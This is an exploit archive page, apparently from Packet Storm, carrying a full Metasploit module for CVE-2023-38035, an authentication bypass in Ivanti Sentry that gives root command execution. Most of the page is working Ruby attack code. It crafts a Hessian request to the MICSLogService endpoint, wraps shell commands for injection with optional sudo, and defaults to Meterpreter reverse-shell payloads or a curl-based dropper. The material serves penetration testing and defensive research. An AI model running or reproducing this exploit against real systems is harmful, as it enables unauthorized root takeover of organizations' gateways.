exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ivanti Sentry Authentication Bypass / Remote Code Execution

Ivanti Sentry Authentication Bypass / Remote Code Execution
Posted Sep 13, 2023
Authored by jheysel-r7, James Horseman, Zach Hanley | Site metasploit.com

This Metasploit module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which allows for code execution in the context of the root user.

tags | exploit, root, code execution
advisories | CVE-2023-38035
SHA-256 | ea4bf146aae20e6532518f5f14a0339f6c32348de42b3b15936e869ed48d8e04

Ivanti Sentry Authentication Bypass / Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)',
'Description' => %q{
This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which
allows for code execution in the context of the root user.
},
'Author' => [
'Zach Hanley', # Analysis & PoC
'James Horseman', # Analysis & PoC
'jheysel-r7' # Msf module
],
'References' => [
[ 'URL', 'https://github.com/horizon3ai/CVE-2023-38035'],
[ 'URL', 'https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/'],
[ 'CVE', '2023-38035']
],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 8443,
'SSL' => true,
'FETCH_WRITABLE_DIR' => '/tmp'
},
'Platform' => ['unix', 'linux'],
'Privileged' => false,
'Arch' => [ ARCH_CMD, ARCH_X64 ],
'Targets' => [
[
'Unix (In-Memory)',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-08-21',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)

register_options(
[
OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true]),
OptInt.new('SLEEP', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining the module needs to split the multi command payload by semi-colon and send each command individually', 3 ]),
]
)
end

def check
# Unauthenticated access to the vulnerable endpoint was removed in patched versions of Sentry.
# Send an unsupported GET request and see if it responds politely.
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),
'method' => 'GET'
)

return Exploit::CheckCode::Unknown('The target did not respond to the vulnerable endpoint') unless res
return Exploit::CheckCode::Safe("A vulnerable instance should respond with an HTTP 405 with the string: 'HessianServiceExporter only supports POST requests' in the response body") unless res.code == 405 && res.body.include?('HessianServiceExporter only supports POST requests')

Exploit::CheckCode::Appears
end

def execute_command(cmd, _opts = {})
# Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput`
# which allows for unauthenticated command execution in the context of the root user.
# More info on Hessian: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers

exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00"
exploit_footer = "S\x00\x06isRootTzNz"

# The sink in this RCE is java's Runtime.getRuntime.exec(). So we must prefix our command with 'sh -c $@|sh .echo'
# in order to obtain full shell functionality, more info: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
cmd = "sh -c $@|sh . echo #{cmd}"
cmd = "sudo #{cmd}" if datastore['USE_SUDO']

vprint_status('Running the command: ' + cmd)

# Prepend the command with the length of the command as per Hessian notation
data = exploit_header + [cmd.length].pack('C') + cmd + exploit_footer
res = send_request_raw(
'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),
'method' => 'POST',
'data' => data
)

fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res
fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
end
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close